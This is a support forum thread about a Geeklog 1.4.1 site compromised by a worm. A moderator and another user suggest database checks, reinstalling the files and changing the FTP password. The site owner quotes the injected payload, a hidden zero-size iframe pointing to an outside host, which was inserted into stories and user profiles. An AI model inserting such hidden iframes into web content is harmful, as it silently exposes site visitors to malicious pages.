Welcome to Geeklog, Anonymous Friday, September 20 2024 @ 09:03 pm EDT

Geeklog Forums

worm infection



last night i sufered a worm infection. I use geeklok 1.4.1. All my stories and comments has an m.winxyz.com reference.

Thank you,


every new user has this web in his profile: <iframe src=http://m.winxyz.com width=0 height=0></iframe>


can it be due to fckeditor sql injection?

Status: offline


Site Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
No idea where it's coming from but it sounds like files on your server were modified, so it could be that your server was compromised.

Searching Google for "m.winxyz.com" finds a lot of hits on other sites (many not running Geeklog), so it doesn't seem to be limited to Geeklog sites.

Make a database backup and check if that link is in there somewhere. If it isn't, the easiest way would be to remove all the files and upload everything fresh, then use the same database.

bye, Dirk


more info about this.

i detected the problem become from a user that has stort admin privilegies. It seems that this user has a troyan that take access to my geeklog site and modifies his stories.

now this user is suspended, but i'm really worried about this situation if the security of my site depends on my users security.

This morning, all accounts on my site have his profile modified, also my profile as admin. I can't explain myself.

The geeklog files are not been modified.

Thank you,

Status: offline


Forum User
Registered: 05/12/07
Posts: 57
I had a similar problem some time ago. The reason was compromised ftp account.
Person that used that account had a virus and from that moment something started inserting linest that pointed to other infected sites in my gl. I downloaded complete gl, and scanned all files to fine code, and than replaced those files.
Faster way to deal with this is to replace all files , and use same old DB as Dirk told you.
And change password on your ftp account, just in case Smile

All times are EDT. The time is now 09:03 pm.

  • Normal Topic
  • Sticky Topic
  • Locked Topic
  • New Post
  • Sticky Topic W/ New Post
  • Locked Topic W/ New Post
  •  View Anonymous Posts
  •  Able to post
  •  Filtered HTML Allowed
  •  Censored Content